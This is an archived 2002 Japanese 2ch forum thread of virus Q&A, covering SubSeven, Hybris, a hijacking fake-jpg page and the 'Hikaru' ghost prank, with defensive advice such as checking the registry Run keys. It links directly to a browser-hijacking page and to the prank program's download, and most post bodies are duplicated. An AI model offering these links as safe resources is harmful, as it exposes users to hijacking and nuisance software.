☆ウィルス情報&質問 総合スレッド☆
1 :名無しさん@お腹いっぱい。:
ウィルスに関わる話題・質問はこちらに
IPAセキュリティセンターhttp://www.ipa.go.jp/security/isg/virus.html
Symantec Security Response http://www.symantec.com/region/jp/sarcj/
Trend Micro ウイルス情報 http://www.trendmicro.co.jp/virusinfo/index.asp
McAfee ウイルス情報 http://www.nai.com/japan/virusinfo/vinfo.asp
[関連リンク]過去ログ・関連スレ等>>2-10あたり
補足>>1-50
IPAセキュリティセンターhttp://www.ipa.go.jp/security/isg/virus.html
Symantec Security Response http://www.symantec.com/region/jp/sarcj/
Trend Micro ウイルス情報 http://www.trendmicro.co.jp/virusinfo/index.asp
McAfee ウイルス情報 http://www.nai.com/japan/virusinfo/vinfo.asp
[関連リンク]過去ログ・関連スレ等>>2-10あたり
補足>>1-50
|
|
|
2 :名無しさん@お腹いっぱい。:02/01/14 03:54
過去スレhttp://pc.2ch.net/test/read.cgi/sec/999636595/l50
[ウィルス対策ソフト]
Norton Internet Security2002 Ver.4 http://pc.2ch.net/test/read.cgi/sec/1009681166/l50
ウイルスバスター2002 Part2 http://pc.2ch.net/test/read.cgi/sec/1009212569/l50
マカフィーってだめなの!PART2 http://pc.2ch.net/test/read.cgi/sec/1007480057/l50
がんばれ!!ウイルス警備隊V3 http://pc.2ch.net/test/read.cgi/sec/1005442785/l50
[ウィルス対策ソフト(無料)]
H+BEDV Antivir Personal Edition http://pc.2ch.net/test/read.cgi/sec/1004122172/l50
AVG Anti-Virus http://pc.2ch.net/test/read.cgi/sec/1001835534/l50
アンチドートを語ろう♪ http://pc.2ch.net/test/read.cgi/sec/1003987914/l50
最強のウィルス対策用ソフト http://pc.2ch.net/test/read.cgi/sec/1000957607/l50
[ウィルス対策ソフト]
Norton Internet Security2002 Ver.4 http://pc.2ch.net/test/read.cgi/sec/1009681166/l50
ウイルスバスター2002 Part2 http://pc.2ch.net/test/read.cgi/sec/1009212569/l50
マカフィーってだめなの!PART2 http://pc.2ch.net/test/read.cgi/sec/1007480057/l50
がんばれ!!ウイルス警備隊V3 http://pc.2ch.net/test/read.cgi/sec/1005442785/l50
[ウィルス対策ソフト(無料)]
H+BEDV Antivir Personal Edition http://pc.2ch.net/test/read.cgi/sec/1004122172/l50
AVG Anti-Virus http://pc.2ch.net/test/read.cgi/sec/1001835534/l50
アンチドートを語ろう♪ http://pc.2ch.net/test/read.cgi/sec/1003987914/l50
最強のウィルス対策用ソフト http://pc.2ch.net/test/read.cgi/sec/1000957607/l50
3 :名無しさん@お腹いっぱい。:02/01/14 03:54
新種のウィルスが流行したときは
専用スレのリンクよろしくお願いします
「Nimda !! 」【その4】 http://pc.2ch.net/test/read.cgi/sec/1001864573/l50
猛威をふるう BADTRANS.B Re: メール (4通目)http://pc.2ch.net/test/read.cgi/sec/1008355163/l50
HDぜんぶ消去した上ズタズタに!!ウィルス http://pc.2ch.net/test/read.cgi/sec/1001662997/l50
Flashムービーに感染するウィルスが登場! http://pc.2ch.net/test/read.cgi/sec/1010564675/l50
'code red'wormに続きw32/sircam http://pc.2ch.net/test/read.cgi/sec/995726416/l50
W32.Aliz.Wormって何? http://pc.2ch.net/test/read.cgi/sec/1006266327/l50
専用スレのリンクよろしくお願いします
「Nimda !! 」【その4】 http://pc.2ch.net/test/read.cgi/sec/1001864573/l50
猛威をふるう BADTRANS.B Re: メール (4通目)http://pc.2ch.net/test/read.cgi/sec/1008355163/l50
HDぜんぶ消去した上ズタズタに!!ウィルス http://pc.2ch.net/test/read.cgi/sec/1001662997/l50
Flashムービーに感染するウィルスが登場! http://pc.2ch.net/test/read.cgi/sec/1010564675/l50
'code red'wormに続きw32/sircam http://pc.2ch.net/test/read.cgi/sec/995726416/l50
W32.Aliz.Wormって何? http://pc.2ch.net/test/read.cgi/sec/1006266327/l50
4 :名無しさん@お腹いっぱい。:02/01/14 03:59
「森で遊ぼう」
(ファイヤーウォール等セキュリティ関係解説サイト
ダウンロードページのリンク 日本語解説ページあり)
http://eazyfox.tripod.co.jp/
・IE(インターネットエクスプローラ)やOE(アウトルックエクスプレス)
は危ないと感じた人達へ
ネスケ(ネットスケープコミュニケータ)を使用する
という手段があることも念頭にいれておいてください
http://home.netscape.com/ja/
(ファイヤーウォール等セキュリティ関係解説サイト
ダウンロードページのリンク 日本語解説ページあり)
http://eazyfox.tripod.co.jp/
・IE(インターネットエクスプローラ)やOE(アウトルックエクスプレス)
は危ないと感じた人達へ
ネスケ(ネットスケープコミュニケータ)を使用する
という手段があることも念頭にいれておいてください
http://home.netscape.com/ja/
5 :名無しさん@お腹いっぱい。:02/01/14 03:59
4げっとー!
6 :名無しさん@お腹いっぱい。:02/01/14 04:00
またIEにセキュリティホール! http://pc.2ch.net/test/read.cgi/sec/1008610094/l50
7 :名無しさん@お腹いっぱい。:02/01/14 04:02
トロイ関係のスレってありませんでした?
8 :名無しさん@お腹いっぱい。:02/01/14 05:25
開いただけでウイルスに感染するページhttp://pc.2ch.net/test/read.cgi/sec/994847789/l50
9 :名無しさん@お腹いっぱい。:02/01/14 06:32
キーボードの[Ctrl]キーと[F]キーを同時に押すと
ページ内検索が出来ます
この機能で スレッド一覧や過去ログから
目的の内容を探すと便利です
ページ内検索が出来ます
この機能で スレッド一覧や過去ログから
目的の内容を探すと便利です
10 :名無しさん@お腹いっぱい。:02/01/14 06:33
11 :名無しさん@お腹いっぱい。:02/01/14 06:34
Mac用ウイルス対策ソフト http://pc.2ch.net/test/read.cgi/sec/1007675941/l50
12 :名無しさん@お腹いっぱい。:02/01/14 06:35
13 :名無しさん@お腹いっぱい。:02/01/14 06:37
みんなでウイルスつくろうよ!!http://pc.2ch.net/test/read.cgi/sec/1008248305/l50
14 :名無しさん@お腹いっぱい。:02/01/14 06:38
[初心者必見]分かりやすいnimda対策ページhttp://pc.2ch.net/test/read.cgi/sec/1001407163/l50
15 :名無しさん@お腹いっぱい。:02/01/14 06:43
16 :名無しさん@お腹いっぱい。:02/01/14 06:58
確かハイブリスのスレがどこかにあったはず
でも見つからない
でも見つからない
17 : :02/01/14 07:11
age
19 :名無しさん@お腹いっぱい。:02/01/14 23:41
ウィルスくれよ。サーカムとか。http://pc.2ch.net/test/read.cgi/sec/996425178/l50
20 :名無しさん@お腹いっぱい。:02/01/15 03:22
新しく感染した人はいないのかな?
21 :名無しさん@お腹いっぱい。:02/01/15 22:46
ウィルス関係のスレがあったら
このスレのリンクを貼っておいてください
データベースとしても使えるので
このスレのリンクを貼っておいてください
データベースとしても使えるので
22 : :02/01/15 22:54
いまさらながら、Nimdaがうるさい。
中国(大陸?)からきているようだ。市ね。
中国(大陸?)からきているようだ。市ね。
23 :名無しさん@お腹いっぱい。:02/01/16 00:49
Symantec Security Check
http://security2.norton.com/SSC/GetBrowser.asp?pkj=TICCYSHSFVIGMKIIPLB&scantype=2&plfid=20&langid=jp&venid=sym&from=/ssc/lunavbrk.asp
http://security2.norton.com/SSC/GetBrowser.asp?pkj=TICCYSHSFVIGMKIIPLB&scantype=2&plfid=20&langid=jp&venid=sym&from=/ssc/lunavbrk.asp
24 :名無しさん@お腹いっぱい。:02/01/16 00:50
25 :名無しさん@お腹いっぱい。:02/01/16 19:06
不謹慎とは思うが
ウィルス系のスレはみんな平和だと暇
ウィルス系のスレはみんな平和だと暇
26 :名無しさん@お腹いっぱい。:02/01/17 18:45
コードレッドパート5 日本政府は反省汁
http://pc.2ch.net/test/read.cgi/sec/997783469/l50
http://pc.2ch.net/test/read.cgi/sec/997783469/l50
27 :名無しさん@お腹いっぱい。:02/01/18 11:37
確かにみんなが右往左往するほうが面白い(w
28 :(;´Д`):02/01/18 22:12
tp://www.geocities.com/ccsacla/images0012.jpg
これを踏んでしまったんですが、どうなるんでしょうか?
これを踏んでしまったんですが、どうなるんでしょうか?
30 :名無しさん@お腹いっぱい。:02/01/18 23:39
>>28
IE使っててスクリプトブロックしてなかったら、スタートページが
//www.geocities.com/fes74592/ssopn.html の、concon含んだブラ
クラペーヂになる。んで、ブラウザのオプションは使えなくなるから「ツ
ール」からは直せなくなる。
スクリプトブロックしててもフレームでssopn.html読むからmailtoはよ
んぢゃうけど。
大したもんぢゃないね(´,_ゝ`)プッ
reg値いぢる直し方は、他の人に任せる。。
若しくは、JS.ExceptionでアンチVIRサイト検索して見て。
IE使っててスクリプトブロックしてなかったら、スタートページが
//www.geocities.com/fes74592/ssopn.html の、concon含んだブラ
クラペーヂになる。んで、ブラウザのオプションは使えなくなるから「ツ
ール」からは直せなくなる。
スクリプトブロックしててもフレームでssopn.html読むからmailtoはよ
んぢゃうけど。
大したもんぢゃないね(´,_ゝ`)プッ
reg値いぢる直し方は、他の人に任せる。。
若しくは、JS.ExceptionでアンチVIRサイト検索して見て。
>>31
ソース見直します・・・・アクティブXの文字が見えたので、「ははぁ〜ん、エクセプションか」なんて思い込んだので。
ソース見直します・・・・アクティブXの文字が見えたので、「ははぁ〜ん、エクセプションか」なんて思い込んだので。
33 :(;´Д`):02/01/19 00:15
>>29>>30>>31 ありがとうございました。
スタートページは変えられてないみたいでしたが。
強制終了した後、PCの動作がすごく遅くなってしまったんですが、
Temporary Internet Fileの「0012.jpg」ファイルを削除したら治りました。
他にもやばい事が起こるんでしょうか?
スタートページは変えられてないみたいでしたが。
強制終了した後、PCの動作がすごく遅くなってしまったんですが、
Temporary Internet Fileの「0012.jpg」ファイルを削除したら治りました。
他にもやばい事が起こるんでしょうか?
>>33
良かったね。スクリプトは切ってあったのね?多分。
スクリプト応用されれば色々だろうけど、、、
だからJS.Exceptionも色々種類あるし。。。
>>32
ざっとしかソース見てないのよ。漏れ(w
なんか面白いもの見つかったら書いてあげて下さい。。。
良かったね。スクリプトは切ってあったのね?多分。
スクリプト応用されれば色々だろうけど、、、
だからJS.Exceptionも色々種類あるし。。。
>>32
ざっとしかソース見てないのよ。漏れ(w
なんか面白いもの見つかったら書いてあげて下さい。。。
view-source:http://www.geocities.com/ccsacla/images0012.jpg
36 : :02/01/19 00:22
ようこそ、2チャンネラーの皆様(^○^)/
どうして貴方がここに来る羽目になったかというと、長い説明が必要に
なります。私は、2年前の12月より、田中康夫長野県政に関するページ
を立ち上げました。それ以前から、田中康夫氏に関して、ちまちま書い
ていたのですが、どうも特定の人々の勘に障ったらしく、選挙期間中に
当方への誹謗中傷スレが立ち上がりました。選挙後、しばらくはなりを
潜めていたのですが、どうやら、いろんな所で恨みを買ったらしく、ま
た、田中知事への不信任案提出が囁かれる昨今のせいか、私をターゲッ
トとした誹謗中傷スレが次々と立ち上がりました。航空・船舶板に「売
れない作家&航空ヲタク「大石英司」を叩け」ニュース速報板に「★作
家がネット上でクラッカーに挑戦状★」(どうやら、クラッカー諸氏に、
私のサイトをクラックしろと唆しているらしい↑)マスコミ板に「★売れ
ない無名三流作家を救え★」タイトルから察するに、この3本は、恐ら
く同一人物が立ち上げたスレと思われます。船舶・航空板にスレが出来
てしばらく後、板違いを根拠に削除を求めましたが、受け入れられませ
んでした。今後とも恐らくは、何の関係もない板に続々とスレが立ち続
けることでしょう。ご迷惑をお掛けしますが、遺憾ながら私には法的措
置を講じる以外の術はありません。(それだって実効性はゼロと言って
良い)たいへん不愉快に思っておりますし、実害も被っておりますが、
不特定多数の顧客を相手にしている以上、ある程度は甘受すべきものと
考えます。残念ながら運営サイドに削除する意思があるとは思えず、し
かしそれは、サーバー上に無用の負担を掛けている以上、運営サイドの
コストであって、幸いにして私のコストではありません。板を移動しつ
つせっせと同様のスレを立ち上げているこの迷惑行為の当人、もしくは
集団が何を意図しているのかは推察するしかありません。私に不愉快な
思いを強いて、田中康夫長野県政への批判を止めさせたいのか(←無駄
なことです)、何処かで私に痛い目に遭わされ、2ちゃんねるという格
好の復讐の場を発見して興奮しているのか。だとしたら、私にはこの人
物の心の平安のために貢献できることは何もありません。ご本人が、某
か復讐に優る人生の関心事を発見してくれることを祈るのみです。
さて私は、貴方がここへ来て、私の本を買ってくれるかも知れないなん
て景気の良いことは考えておりません。しかし、ここに大石英司という
作家がいて、こんなこをやっているということが貴方の脳裏にインプッ
トされるだろうことを、ささやかな喜びとするものです。
どうして貴方がここに来る羽目になったかというと、長い説明が必要に
なります。私は、2年前の12月より、田中康夫長野県政に関するページ
を立ち上げました。それ以前から、田中康夫氏に関して、ちまちま書い
ていたのですが、どうも特定の人々の勘に障ったらしく、選挙期間中に
当方への誹謗中傷スレが立ち上がりました。選挙後、しばらくはなりを
潜めていたのですが、どうやら、いろんな所で恨みを買ったらしく、ま
た、田中知事への不信任案提出が囁かれる昨今のせいか、私をターゲッ
トとした誹謗中傷スレが次々と立ち上がりました。航空・船舶板に「売
れない作家&航空ヲタク「大石英司」を叩け」ニュース速報板に「★作
家がネット上でクラッカーに挑戦状★」(どうやら、クラッカー諸氏に、
私のサイトをクラックしろと唆しているらしい↑)マスコミ板に「★売れ
ない無名三流作家を救え★」タイトルから察するに、この3本は、恐ら
く同一人物が立ち上げたスレと思われます。船舶・航空板にスレが出来
てしばらく後、板違いを根拠に削除を求めましたが、受け入れられませ
んでした。今後とも恐らくは、何の関係もない板に続々とスレが立ち続
けることでしょう。ご迷惑をお掛けしますが、遺憾ながら私には法的措
置を講じる以外の術はありません。(それだって実効性はゼロと言って
良い)たいへん不愉快に思っておりますし、実害も被っておりますが、
不特定多数の顧客を相手にしている以上、ある程度は甘受すべきものと
考えます。残念ながら運営サイドに削除する意思があるとは思えず、し
かしそれは、サーバー上に無用の負担を掛けている以上、運営サイドの
コストであって、幸いにして私のコストではありません。板を移動しつ
つせっせと同様のスレを立ち上げているこの迷惑行為の当人、もしくは
集団が何を意図しているのかは推察するしかありません。私に不愉快な
思いを強いて、田中康夫長野県政への批判を止めさせたいのか(←無駄
なことです)、何処かで私に痛い目に遭わされ、2ちゃんねるという格
好の復讐の場を発見して興奮しているのか。だとしたら、私にはこの人
物の心の平安のために貢献できることは何もありません。ご本人が、某
か復讐に優る人生の関心事を発見してくれることを祈るのみです。
さて私は、貴方がここへ来て、私の本を買ってくれるかも知れないなん
て景気の良いことは考えておりません。しかし、ここに大石英司という
作家がいて、こんなこをやっているということが貴方の脳裏にインプッ
トされるだろうことを、ささやかな喜びとするものです。
37 :名無しさん@お腹いっぱい。:02/01/19 00:24
33のメアド欄に萌え
38 :ひみつの検疫さん:2024/12/20(金) 13:56:39 ID:MarkedRes
汚染を除去しました。
39 :↑注意注意注意注意注意注意注意!!!!:02/01/19 00:30
>>35
気がつきませんでした、すみません…。
気がつきませんでした、すみません…。
41 :名無しさん@お腹いっぱい。:02/01/19 00:35
な、なんでみんなメアド書きたがるんだ。。
42 :名無しさん@お腹いっぱい。:02/01/19 01:09
あまりにも安全な行動しかしてないと
フリーメールでRe:メールをもらうくらいしか
おきませんね
フリーメールでRe:メールをもらうくらいしか
おきませんね
jpgで中身がhtmlなヤツをhtmlとして開いてしまうのは
Ieだけでしたっけ?
Ieだけでしたっけ?
44 :ガイシュツだったらスマソ:02/01/19 01:42
どこにも公開してないメールアドレスに、登録したはずのないメーリングリスト経由で
exeファイルのついたメールが2通きてるんだけど、これってウイルスだよね?
タイトルは化けてて→ !"#%&')*+-/0244689<= と !"#$
sumif.exe と DPLAYSVR.EXE っていうのが添付されてた。
誰か知ってる人いたら教えてください よろしこ
exeファイルのついたメールが2通きてるんだけど、これってウイルスだよね?
タイトルは化けてて→ !"#%&')*+-/0244689<= と !"#$
sumif.exe と DPLAYSVR.EXE っていうのが添付されてた。
誰か知ってる人いたら教えてください よろしこ
45 :名無しさん@お腹いっぱい。:02/01/19 02:15
>>44
ウイルスかどうか関係無しに、
身に覚えのないメール、身に覚えのない添付ファイル
なら削除すべきでしょうな…。
ちなみに勉強のためなら、そのファイル名を
Googleで検索したら自分でも調べられますよ。
ウイルスかどうか関係無しに、
身に覚えのないメール、身に覚えのない添付ファイル
なら削除すべきでしょうな…。
ちなみに勉強のためなら、そのファイル名を
Googleで検索したら自分でも調べられますよ。
46 :名無しさん@お腹いっぱい。:02/01/19 06:23
47 :名無しさん@お腹いっぱい。:02/01/19 08:15
48 :名無しさん@お腹いっぱい。:02/01/19 13:25
>44
それってDIONですよね!!
今朝そのメールとしらない人経由のメールがたくさん・・
どうしよう!!
文字化けメールは削除しましたがその後の対応は・・・・
それってDIONですよね!!
今朝そのメールとしらない人経由のメールがたくさん・・
どうしよう!!
文字化けメールは削除しましたがその後の対応は・・・・
49 :名無しさん@お腹いっぱい。:02/01/19 14:03
にしても、最近来るウイルスメールって、ジェネレータで
作成したらしいウイルス、やたら多くない?
作成したらしいウイルス、やたら多くない?
50 :名無しさん@お腹いっぱい。:02/01/19 14:20
52 :名無しさん@お腹いっぱい。:02/01/19 17:45
>>48
うちにもいっぱい来てたよ。
うちにもいっぱい来てたよ。
53 :名無しさん@お腹いっぱい。:02/01/20 01:59
どうやらあるウイルスに感染したようでネットにつないでいると突然幽霊の女性の画面が出てきてしまいます。
ウイルスチェックしてもだめなんですがどうすれば良いのでしょう?
ウイルスチェックしてもだめなんですがどうすれば良いのでしょう?
54 :名無しさん@お腹いっぱい。:02/01/20 02:15
http://www.forest.impress.co.jp/article/2001/11/21/hikaru_1r.gif
まさかと思うけどこれじゃないよね。
まさかと思うけどこれじゃないよね。
55 :名無しさん@お腹いっぱい。:02/01/20 03:48
56 :名無しさん@お腹いっぱい。:02/01/20 08:36
>>54
それです!!どうやったら削除できるの?
それです!!どうやったら削除できるの?
57 : :02/01/20 09:19
顔が出てくるというのは、ウィルスではないんで、
初級ネット板の下記のスレッドにどうぞ。
対処法もそっちで見てください。
http://pc.2ch.net/test/read.cgi/hack/1011083919/
本当に不用心で、挙げ句の果てにうろたえるヤツが多いなあ。
でもって調べないし。
初級ネット板の下記のスレッドにどうぞ。
対処法もそっちで見てください。
http://pc.2ch.net/test/read.cgi/hack/1011083919/
本当に不用心で、挙げ句の果てにうろたえるヤツが多いなあ。
でもって調べないし。
58 :56:02/01/20 11:22
>>57
感謝
感謝
59 :おしえて:02/01/20 13:26
なんかシステムホルダの中に「いたずらしてごめんね」って
いうファイルが1000個もあった。
でウィルススキャンしたら「トロイの木馬」が3匹いて
それらは削除したんだけど、このウィルスっていったい何をするんですか?
いうファイルが1000個もあった。
でウィルススキャンしたら「トロイの木馬」が3匹いて
それらは削除したんだけど、このウィルスっていったい何をするんですか?
60 : :02/01/20 14:48
本来的にはウイルスとトロイの木馬は別物だったんだけど、
ウイルスが広義に使われるようになっているからなあ。
基本的にトロイの木馬っつったら、
内部に入り込んで破壊活動するもの。
神話か歴史か知らないけど、でかい木馬の中に兵隊がひそんで
鉄壁状態の町の中にまんまと入り込んだという故事から。
破壊活動の内容は、プログラムによりさまざま。
ただし、ウイルスのように増殖活動するとは限らない。
(元々は破壊だけして増殖しないものの名称だった。)
ウイルス、ワーム、トロイの木馬などは
用語解説サイト
http://www.e-words.ne.jp/
とかや、アンチウイルスソフトの会社サイト
(Badtransとかのスレにリンクがある)の解説ページで
もちょっと詳しいことや正確なことが分かる。
ウイルスが広義に使われるようになっているからなあ。
基本的にトロイの木馬っつったら、
内部に入り込んで破壊活動するもの。
神話か歴史か知らないけど、でかい木馬の中に兵隊がひそんで
鉄壁状態の町の中にまんまと入り込んだという故事から。
破壊活動の内容は、プログラムによりさまざま。
ただし、ウイルスのように増殖活動するとは限らない。
(元々は破壊だけして増殖しないものの名称だった。)
ウイルス、ワーム、トロイの木馬などは
用語解説サイト
http://www.e-words.ne.jp/
とかや、アンチウイルスソフトの会社サイト
(Badtransとかのスレにリンクがある)の解説ページで
もちょっと詳しいことや正確なことが分かる。
61 :実際でかい木馬がある。:02/01/20 15:05
ほんとにでかい。
62 :助けて〜:02/01/20 15:09
なんか変なファイルダウンロード(ヒカルだったか?)
したら、青い顔が、出るようになっちゃって
全部削除したんだけど、まだ出るよ〜
心臓に悪いので、だれか教えて?
したら、青い顔が、出るようになっちゃって
全部削除したんだけど、まだ出るよ〜
心臓に悪いので、だれか教えて?
每經過一定的時間,螢幕上會突然出現女鬼圖片的整人程式。
本程式啟動後並不會顯示任何視窗或訊息,但是此時程式已常駐至電腦的記憶體內,
數分鐘後,螢幕上會突然出現一個女鬼的圖片,同時喇叭也會發出驚悚的尖叫聲。
※ 警告:孩童、孕婦、及心臟或精神疾病患者,請勿執行本程式!!!
http://www.geocities.co.jp/SiliconValley-Cupertino/9822/
http://www.geocities.co.jp/SiliconValley-Cupertino/9822/mysoft/mysoft.html
http://my.vector.co.jp/servlet/System.FileDownload/download/http/0/217070/pack/win95/amuse/joke/hikaru04.zip
http://www.geocities.co.jp/SiliconValley-Cupertino/9822/mysoft/img/madoka.jpg
本程式啟動後並不會顯示任何視窗或訊息,但是此時程式已常駐至電腦的記憶體內,
數分鐘後,螢幕上會突然出現一個女鬼的圖片,同時喇叭也會發出驚悚的尖叫聲。
※ 警告:孩童、孕婦、及心臟或精神疾病患者,請勿執行本程式!!!
http://www.geocities.co.jp/SiliconValley-Cupertino/9822/
http://www.geocities.co.jp/SiliconValley-Cupertino/9822/mysoft/mysoft.html
http://my.vector.co.jp/servlet/System.FileDownload/download/http/0/217070/pack/win95/amuse/joke/hikaru04.zip
http://www.geocities.co.jp/SiliconValley-Cupertino/9822/mysoft/img/madoka.jpg
64 :62 何でダウンロードしたん?:02/01/20 15:11
警告:孩童、孕婦、及心臟或精神疾病患者,請勿執行本程式!!!
65 :助けて〜:02/01/20 15:13
また 出たよ!
66 :おしえて:02/01/20 15:26
>>60
どうもです。
いろいろチェックしてみたけど、どこも破壊されてないみたい
なんだけど。
特にもんだいないですか?
どうもです。
いろいろチェックしてみたけど、どこも破壊されてないみたい
なんだけど。
特にもんだいないですか?
67 : :02/01/20 15:55
変な顔がどうのこうの書いているヤツは>>57ぐらい見ろや。
あちこちの板やスレでこればっかりだ、とにもお。
>>66
破壊されてない「みたい」と書かれてもなあ。
とにかく、相手はプログラムなんだから、
どういう活動をするかは作り手の考え方次第。
何か(特定日時、ユーザーの特定アクションなど)をきっかけに
何か(特定ファイルの消去など)をするわけだけど、
ラッキーだったら、
きっかけがなかった、とか、
何かをできなかった(消去対象がWordファイルとかだったら
Word使っていなかったなら何もされないわなあ)とかで、
破壊されないことはあり得る。
まあ、注意して用心しながらやっていってくらはい。
あちこちの板やスレでこればっかりだ、とにもお。
>>66
破壊されてない「みたい」と書かれてもなあ。
とにかく、相手はプログラムなんだから、
どういう活動をするかは作り手の考え方次第。
何か(特定日時、ユーザーの特定アクションなど)をきっかけに
何か(特定ファイルの消去など)をするわけだけど、
ラッキーだったら、
きっかけがなかった、とか、
何かをできなかった(消去対象がWordファイルとかだったら
Word使っていなかったなら何もされないわなあ)とかで、
破壊されないことはあり得る。
まあ、注意して用心しながらやっていってくらはい。
68 :おしえて:02/01/20 16:16
>>67さんありがとう
ということは今後何かのきっかけで、作動する恐れがあるってことですよね。
ウィルススキャンでひっかかった「トロイの木馬」は削除したのに、
何か形をかえて潜んでいるってことですか?
もしそうなら、何をすれば良いんでしょう?
ということは今後何かのきっかけで、作動する恐れがあるってことですよね。
ウィルススキャンでひっかかった「トロイの木馬」は削除したのに、
何か形をかえて潜んでいるってことですか?
もしそうなら、何をすれば良いんでしょう?
69 : :02/01/20 17:13
>>68
アンチウイルスソフトを最新の状態にして除去したのなら
それ以上どうしようもないでしょ?
データなどのバックアップはしっかりとるとか、
セキュリティに注意して運用していくしかしかたないんじゃ
ないの?
アンラッキーにも破壊が行われていた場合、
見つかり次第修復するっきゃないでしょ?
ラッキーにも破壊が行われておらず、
判別できた限りの「トロイの木馬」を除去できたとしても
もしか、アンチウイルスソフトが対応できていない新種で、
除去される前に何かしていないとはいいきれないわなあ。
「多分大丈夫でしょう」とか書くのは簡単だけど、
そんなの何の保証にもならないんだし。
もうこれ以上質問しても答えられることはないように思うよ、
正直なところ。
アンチウイルスソフトを最新の状態にして除去したのなら
それ以上どうしようもないでしょ?
データなどのバックアップはしっかりとるとか、
セキュリティに注意して運用していくしかしかたないんじゃ
ないの?
アンラッキーにも破壊が行われていた場合、
見つかり次第修復するっきゃないでしょ?
ラッキーにも破壊が行われておらず、
判別できた限りの「トロイの木馬」を除去できたとしても
もしか、アンチウイルスソフトが対応できていない新種で、
除去される前に何かしていないとはいいきれないわなあ。
「多分大丈夫でしょう」とか書くのは簡単だけど、
そんなの何の保証にもならないんだし。
もうこれ以上質問しても答えられることはないように思うよ、
正直なところ。
70 :おしえて:02/01/20 17:58
>>69
どうもでした。なにも起こらない事を祈ります。
どうもでした。なにも起こらない事を祈ります。
71 :名無しさん@お腹いっぱい。:02/01/21 20:29
訳のわからない添付ファイルは
まず開かないほうがいい
まず開かないほうがいい
72 :マジレス希望です:02/01/21 20:59
日付: 2002/01/21 時刻: 18:56:34
規則 Backdoor/SubSeven トロイの木馬のデフォルト遮断 のセキュリティ警告を表示しました
リモートコンピュータ (68.52.197.223、 3274)
2ch見てたら,突然警告音!!! ↑
助けてください
これってヤバイですか???
モウ感染してるのか???
ノートンでウイルススキャンしたら大丈夫そうだったが
マジ教えてくださいすいません
規則 Backdoor/SubSeven トロイの木馬のデフォルト遮断 のセキュリティ警告を表示しました
リモートコンピュータ (68.52.197.223、 3274)
2ch見てたら,突然警告音!!! ↑
助けてください
これってヤバイですか???
モウ感染してるのか???
ノートンでウイルススキャンしたら大丈夫そうだったが
マジ教えてくださいすいません
73 :名無しさん@お腹いっぱい。:02/01/21 21:36
>>72
その前に、思いっきりマルチな君の投稿をなんとかしたまえ。
その前に、思いっきりマルチな君の投稿をなんとかしたまえ。
74 :名無しさん@お腹いっぱい。:02/01/21 23:21
BFEBLOBF.EXE
ってウイルスですか?
なんかたびたび送られてくるんですが
ってウイルスですか?
なんかたびたび送られてくるんですが
75 :名無しさん@お腹いっぱい。:02/01/21 23:22
>>74
ウィルスです。それも出尽くした感すらある。
ウィルスです。それも出尽くした感すらある。
76 :名無しさん@お腹いっぱい。:02/01/21 23:24
Hybrisでしたっけ、スペル?
79 :名無しさん@お腹いっぱい。:02/01/21 23:32
そうみたい。。
80 :ヘルプ:02/01/21 23:38
TRO J_SUBSEVN.213ウイルスに感染ました。対処方教えてください。
前もTRO系に感染し、
表向きは駆除したのですがレジストリをいじらないと完全駆除できなかったので
泣く泣くPC初期化したのですが、復活まで2日もかかったので助けてください。
とりあえず、センター行って情報見てきます。
前もTRO系に感染し、
表向きは駆除したのですがレジストリをいじらないと完全駆除できなかったので
泣く泣くPC初期化したのですが、復活まで2日もかかったので助けてください。
とりあえず、センター行って情報見てきます。
81 :名無しさん@お腹いっぱい。:02/01/21 23:42
>>80
たまにはレジストリもいぢってやってください。
たまにはレジストリもいぢってやってください。
82 :名無しさん@お腹いっぱい。:02/01/21 23:50
74です。
情報下さったみなさんありがとうございました!
情報下さったみなさんありがとうございました!
>>80
それって有名だから、ノートンでもバスターでもチェックできるんだけど。何回も感染するのは、怪しくない?近いところに犯人がいるかも。ad-aware使って他のトロイが入っていないか、チェックした方がいいですよ♪
それって有名だから、ノートンでもバスターでもチェックできるんだけど。何回も感染するのは、怪しくない?近いところに犯人がいるかも。ad-aware使って他のトロイが入っていないか、チェックした方がいいですよ♪
84 :ヘルプ:02/01/22 00:00
センター行ってきました。やっぱり前と同じレジいじりが必要そうです。
墓守ad-awareてなんですか?
墓守ad-awareてなんですか?
85 :ヘルプ:02/01/22 00:01
墓守さん、ad-awareてなんですか? でした。
86 :名無しさん@お腹いっぱい。:02/01/22 00:03
>>85
検索できるチャンス
検索できるチャンス
>>84
トロイ検出では、世界でもっとも使えるツールです。
トロイ検出では、世界でもっとも使えるツールです。
88 :名無しさん@お腹いっぱい。:02/01/22 00:03
89 :ヘルプ:02/01/22 00:16
ad-aware使えばレジストリいじらなくても医院ですか?
とりあえず落としてきます。
とりあえず落としてきます。
90 :名無しさん@お腹いっぱい。:02/01/22 00:19
>>89
レジストリぐらいいじってください。
で↓をお気に入りに登録してください
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
レジストリぐらいいじってください。
で↓をお気に入りに登録してください
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
91 :ヘルプ:02/01/22 00:26
>90
いじってみます。
システムエディタでいいんですよね。
いじってみます。
システムエディタでいいんですよね。
92 :名無しさん@お腹いっぱい。:02/01/22 00:28
93 :ヘルプ:02/01/22 00:32
ありました。
システムエディタとレジストリて違うんですか?
システムエディタとレジストリて違うんですか?
94 :ヘルプ:02/01/22 00:34
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ない?RUN
95 :名無しさん@お腹いっぱい。:02/01/22 00:35
96 :ヘルプ:02/01/22 00:36
>95
なるほどね!!
なるほどね!!
おまけ。
HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ RunOnce
HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ RunOnce
HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ RunOnce
HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ RunOnce
98 :ヘルプ:02/01/22 00:40
お気に入りのついかの仕方がどうも分からんのですが?
99 :名無しさん@お腹いっぱい。:02/01/22 00:41
>>98
それよりサブセブンは駆除できたのかい?
それよりサブセブンは駆除できたのかい?
100 :名無しさん@お腹いっぱい。:02/01/22 00:42
おめこ。
〜〜\CurrentVersion\RunService
〜〜\CurrentVersion\RunService
101 :ヘルプ:02/01/22 00:43
まだ解凍しておりません。Ad-aware。
とりあえずためしてみます。
とりあえずためしてみます。
